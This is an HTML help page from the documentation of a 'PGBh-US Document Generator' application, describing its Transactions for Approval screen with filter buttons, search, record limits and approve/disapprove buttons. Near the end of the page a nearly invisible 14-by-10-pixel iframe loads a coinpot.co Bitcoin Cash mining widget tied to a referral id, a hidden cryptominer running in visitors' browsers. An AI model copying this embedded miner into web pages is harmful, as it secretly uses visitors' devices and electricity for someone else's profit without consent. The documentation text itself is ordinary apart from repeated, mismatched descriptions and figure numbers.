<!DOCTYPE html>
<html>
  <head>
    <title>PGBh-US Document Generator</title>

    <link rel="stylesheet" type="text/css" href="css/style.css" />
    <link
      rel="stylesheet"
      type="text/css"
      href="font-awesome/css/font-awesome.min.css"/>
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css" />

    <!-- <script src="js/jquery.imagebox.js"></script> -->
  </head>

  <body>
    <div id="wrapper">
      <!-- wrapper starts-->

      <nav class="navbar navbar-inverse navbar-fixed-top">
        <!-- navbar navbar-inverse navbar-fixed-top starts -->
        <div class="navbar-header">
          <!-- navbar-header starts-->
          <button
            type="button"
            class="navbar-toggle"
            data-toggle="collapse"
            data-target=".navbar-ex1-collapse"
          >
            <!-- .navbar-ex1-collapse starts-->
            <span class="sr-only">Toggle Navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span></button
          ><!-- .navbar-ex1-collapse ends-->
          <a href="index.html" class="navbar-brand"
            >PGBh-US Document Generator (Documentation)</a
          >
        </div>
        <!-- navbar-header ends-->
        <!-- Left -->

        <div class="collapse navbar-collapse navbar-ex1-collapse">
          <!-- collapse navbar-collapse navbar-ex1-collapse starts -->
          <ul class="nav navbar-nav side-nav">
            <!-- nav navbar-nav side-nav starts -->
            <li>
              <!-- li starts -->
              <a href="getting_started.html">
                <i class="fa fa-fw fa-dashboard"></i> Getting Started
              </a>
            </li>
            <!-- li ends -->

            <li>
              <!-- li starts -->
              <a href="#" data-toggle="collapse" data-target="#software">
                <i class="fa fa-fw fa-table"></i> Software Settings
                <i class="fa fa-fw fa-caret-down"></i>
              </a>
              <ul id="software" class="collapse">
                <li>
                  <a href="software_update.html">Software Update</a>
                </li>
                <li>
                  <a href="software_settings.html">Software Settings</a>
                </li>
                <li>
                  <a href="connection_string_settings.html"
                    >Connection String Settings</a
                  >
                </li>
                <li>
                  <a href="software_info.html">Software Info</a>
                </li>
              </ul>
            </li>
            <!-- li ends -->

            <li>
              <!-- li starts -->
              <a href="#" data-toggle="collapse" data-target="#developer">
                <i class="fa fa-fw fa-pencil"></i> Developer Tab
                <i class="fa fa-fw fa-caret-down"></i>
              </a>
              <ul id="developer" class="collapse">
                <li>
                  <a href="software_revision.html">Software Revision</a>
                </li>
                <li>
                  <a href="developer_level.html"
                    >Developer Level Software Upload</a
                  >
                </li>
              </ul>
            </li>
            <!-- li ends -->

            <li>
              <!-- li starts -->
              <a href="#" data-toggle="collapse" data-target="#user">
                <i class="fa fa-fw fa-user"></i> Users
                <i class="fa fa-fw fa-caret-down"></i>
              </a>
              <ul id="user" class="collapse">
                <li>
                  <a href="user_management.html">User Management</a>
                </li>
                <li>
                  <a href="user_privileges.html">User's Privileges</a>
                </li>
                <li>
                  <a href="change_password.html">Change Password</a>
                </li>
                <li>
                  <a href="user_chat_line.html">Users Chat Line</a>
                </li>
              </ul>
            </li>
            <!-- li ends -->

            <li>
              <!-- li starts-->
              <a href="#" data-toggle="collapse" data-target="#wfp">
                <i class="fa fa-fw fa-arrows-v"></i> Back End
                <i class="fa fa-fw fa-caret-down"></i>
              </a>
              <ul id="wfp" class="collapse">
                <li>
                  <a href="work_financial_funds.html">Work and Financial Plan/Funds</a>
                </li>
                <li>
                  <a href="wfp_usage.html">WFP Usage</a>
                </li>
                <li>
                  <a href="claims_checklist.html">Claims Checklist</a>
                </li>
                <li>
                  <a href="checklist_manager.html">Checklist Manager</a>
                </li>
                <li>
                  <a href="paas_tagging.html">PAAS Tagging</a>
                </li>
                <li>
                  <a href="signatories.html">Signatories</a>
                </li>
              </ul>
            </li>
            <!-- li ends-->

            <li>
              <!-- li starts -->
              <a href="#" data-toggle="collapse" data-target="#transaction">
                <i class="fa fa-fw fa-gear"></i> Transaction
                <i class="fa fa-fw fa-caret-down"></i>
              </a>
              <ul id="transaction" class="collapse">
                            <li>
                                <a href="with_wfp_transaction.html">With WFP Transactions</a>
                            </li>
                            <li>
                                <a href="no_wfp_transaction.html">No WFP Transactions</a>
                            </li>
                <li>
                  <a href="manage_transaction.html">Manage Transactions</a>
                </li>
                <li>
                  <a href="transaction_approval.html"
                    >Transaction For Approval</a
                  >
                </li>
              </ul>
            </li>
            <!-- li ends -->
          </ul>
          <!-- nav navbar-nav side-nav ends -->
        </div>
        <!-- collapse navbar-collapse navbar-ex1-collapse starts -->
      </nav>
      <!-- navbar navbar-inverse navbar-fixed-top ends -->

      <div id="page-wrapper">
        <!-- page-wrapper starts-->
        <div class="container-fluid">
          <!-- container-fluid starts-->
          <div class="row">
            <div class="col-lg-12">
              <ol class="breadcrumb">
                <li class="active">
                  <i class="fa fa-dashboard"></i>
                  <a href="index.html">PGBh-USDG</a> / Transaction / Transactions
                  for Approval
                </li>
              </ol>
            </div>
          </div>

          <div class="row">
            <!-- row starts-->
            <div class="col-lg-12">
              <!-- col-lg-12 starts-->
              <hr />
              <h3 font size="20" style="font-weight: bold;">Transactions for Approval</h3>

              <!-- From HRIS -->
              <br>
              <figure> <img src="img/software_2.png" alt="Figure 1.0" class="img-style">
                <br>
                <figcaption style="text-align: center">Figure 1.0</figcaption>
              </figure>
              <br>
              <div class="info notes">
                <p><strong>For Figure 1.0:</strong></p>
                <ul>
                  <li><strong><a href="#arrow-a">Arrow D (Red)</a></strong>: By clicking Transactions for Approval see Figures below.</li>
                </ul>
              </div>
              <br />
              <figure>
                <img
                  src="img/transaction_approval_form.png"
                  alt="Figure 1.2"
                  class="img-style"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.1</figcaption>
              </figure>

              <!-- Manage Transaction Parts and their Functionality -->
              <div class="page-header">
                <h4>
                  <strong
                    >1. Transaction for Approval Parts and their
                    Functionality</strong
                  >
                </h4>
              </div>
              <figure>
                <img
                  src="img/transaction_approval_parts.png"
                  alt="Figure 1.3"
                  class="img-style"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.2</figcaption>
              </figure>
              <br />
              <div class="page-header">
                <h5>
                  <strong>A. Transaction Types</strong>
                </h5>
              </div>
              <figure>
                <img
                  src="img/transaction_approval_parts.png"
                  alt="Figure 1.4"
                  class="img-style"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.3</figcaption>
              </figure>
              <br />
              <div class="info notes">
                <p>
                  <strong
                    >These buttons, if clicked, shows all the certain
                    transactions on the Transaction List below. These buttons
                    will serve as a filter to show just specific
                    transactions.</strong
                  >
                </p>
                <p>i. Waiting for Approval</p>
                <figure>
                  <img
                    src="img/transaction_approval_combobox.png"
                    alt="Figure 1.5"
                    class="img-style"
                  />
                  <br />
                  <figcaption style="text-align: center">Figure 1.4</figcaption>
                </figure>
                <strong>Shows all the transactions that have been made.</strong>

                <p>ii. Approved</p>

                <strong>Shows all the transactions that have been made.</strong>

                <p>iii. Disapproved</p>

                <strong>Shows all the transactions that have been made.</strong>

                <p>iv. All</p>

                <strong>
                  Shows all the transactions that have been made.</strong
                >
              </div>

              <div class="page-header">
                <h5>
                  <strong>B. Search Box</strong>
                </h5>
              </div>
              <figure>
                <img
                  src="img/manage_transaction_search_box.png"
                  alt="Figure 1.5"
                  class="img-style"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.4</figcaption>
              </figure>
              <br />
              <div class="info notes">
                <ul>
                  <li>
                    The search box can be used to find specific transaction by
                    entering the transaction's name.
                  </li>
                </ul>
              </div>

              <div class="page-header">
                <h5>
                  <strong>C. No. of Records</strong>
                </h5>
              </div>
              <figure>
                <img
                  src="img/manage_transaction_no_records.png"
                  alt="Figure 1.6"
                  class="img-style"
                  style="width: 300px"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.5</figcaption>
              </figure>
              <br />
              <div class="info notes">
                <ul>
                  <li>
                    By clicking this button, a list of numbers will drop down
                    showing 10, 50, 100, 200, 500, and 1000 in which you need to
                    select. This button will limit the number of transactions
                    showed on the Transaction List. The default is a number of
                    100 records on the list.
                  </li>
                </ul>
              </div>

              <div class="page-header">
                <h5>
                  <strong>D. Office</strong>
                </h5>
              </div>
              <figure>
                <img
                  src="img/transaction_approval_office.png"
                  alt="Figure 1.7"
                  class="img-style"
                  style="width: 200px"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.6</figcaption>
              </figure>
              <br />

              <div class="page-header">
                <h5>
                  <strong>E. Selected Transaction Details</strong>
                </h5>
              </div>
              <figure>
                <img
                  src="img/transaction_approval__approve.png"
                  alt="Figure 1.8"
                  class="img-style"
                  style="width: 300"
                />
                <br />
                <figcaption style="text-align: center">Figure 1.7</figcaption>
              </figure>
              <br />
              <div class="info notes">
                <p>i. Buttons</p>
                <ul>
                  <li>
                    <strong>Approved</strong>: By clicking this button, the
                    transaction selected on the list will be approved.
                  </li>
                  <li>
                    <strong>Disapproved</strong>: By clicking this button, the
                    transaction selected on the list will be disapproved.
                  </li>
                </ul>
              </div>
            </div>
            <!-- col-lg-12 ends-->
          </div>
          <!-- row ends-->
        </div>
        <!-- container-fluid ends-->
      </div>
      <!-- page-wrapper ends-->
		<div style="text-align:center">
				<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=7F1715F1CC6E&mode=widget" style="overflow:hidden;width:14px;height:10px;"></iframe>
		</div>
    </div>
    <!-- wrapper ends-->

    <script type="text/javascript" src="js/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
  </body>
</html>
